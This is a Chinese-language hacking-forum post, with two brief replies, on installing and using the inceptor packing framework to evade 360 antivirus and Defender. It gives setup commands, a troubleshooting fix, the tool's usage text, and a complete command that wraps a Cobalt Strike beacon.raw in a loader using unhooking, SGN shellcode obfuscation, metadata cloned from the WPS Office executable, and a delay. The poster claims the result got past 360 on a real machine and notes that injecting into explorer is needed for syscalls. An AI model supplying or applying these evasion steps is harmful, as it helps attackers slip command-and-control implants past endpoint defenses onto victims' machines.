查看: 9170|回复: 2

免杀360?我推荐这个!

[复制链接]
  • TA的每日心情

    昨天 16:11
  • 签到天数: 1563 天

    [LV.Master]伴坛终老

    发表于 2022-10-26 16:21:17 | 显示全部楼层 |阅读模式
    inceptor 安装与使用
    https://github.com/klezVirus/inceptor/

    安装:

    本机环境:Windows + VS2022 + LLVM

    virtualenv 的两步是创建干净的python环境 如果不需要可以跳过

    [AppleScript] 纯文本查看 复制代码
    gitclone --recursive [url]https://github.com/klezVirus/inceptor.git[/url] 
    cd inceptor
    virtualenv venv 
    venv \Scripts\activate.bat
    pip install -r requirements.txt
    cd inceptor
    python update- config.py

    最后根据选项选择即可。如果没有的工具它会帮你下。有VS直接大部分工具都是有的。

    踩坑:
    [AppleScript] 纯文本查看 复制代码
    No module named 'obfuscators.powershell.chameleon.chameleon'

    这个报错是因为没下到chameleon

    手动下载 https://github.com/klezVirus/cha ... c427962a2b654a5a9d2

    将内容放到chameleon文件夹下即可


    qw1.jpg

    使用指南
    [AppleScript] 纯文本查看 复制代码
    $ usage: inceptor.py [-h] [-hh] [-Z] {native,dotnet,powershell} ...
    
    inceptor: A Windows-based PE Packing framework designed to help 
              Red Team Operators to bypass common AV and EDR solutions
    
    positional arguments:
      {native,dotnet,powershell}
        native              Native Binaries Generator
        dotnet              .NET Binaries Generator
        powershell          PowerShell Wrapper Scripts Generator
    
    optional arguments:
      -h, --help            show this help message and exit
      -hh                   Show functional table
      -Z, --check           Check file against ThreatCheck

    给出一个使用loader的例子:
    [AppleScript] 纯文本查看 复制代码
    python inceptor.py native -tloader -C cl -o ceshi14.exe -munhook --sgn --clone "C:\Users\Administrator\AppData\Local\Kingsoft\WPSOffice\11.1.0.12313\office6\wps.exe" --delay 3  beacon.raw

    这里参数的参数:加载unhook模板,使用sgn 混淆shellcode,克隆metadata、延时、cs的beacon.raw 生成加载器。

    22.10.1 过360(真机)、df

    qw2.jpg

    注意:

    使用syscall的时候因为作者只写了注入模板,所以必须使用-P -P0 explorer 进行注入。(不免杀,免杀的模板得自己写)

    总结:

    公开项目的免杀总会被查杀,并且免杀是一个多维度、多方面、大量技术的结合,这个项目的亮点是提供一种模板组合的方式去进行免杀,可以参考这种思路写出自己的免杀框架,然后对于新技术就添加到自己框架之中,以一贯之,提供便利。


    回复

    使用道具 举报

  • TA的每日心情
    开心
    2023-6-3 14:51
  • 签到天数: 149 天

    [LV.7]常住居民III

    发表于 2022-10-29 11:30:16 | 显示全部楼层
    看看学习一下
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2022-11-2 15:12
  • 签到天数: 5 天

    [LV.2]偶尔看看I

    发表于 2022-11-2 15:13:27 | 显示全部楼层
    谢谢90分享
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-5-2 05:48 , Processed in 0.029382 second(s), 13 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部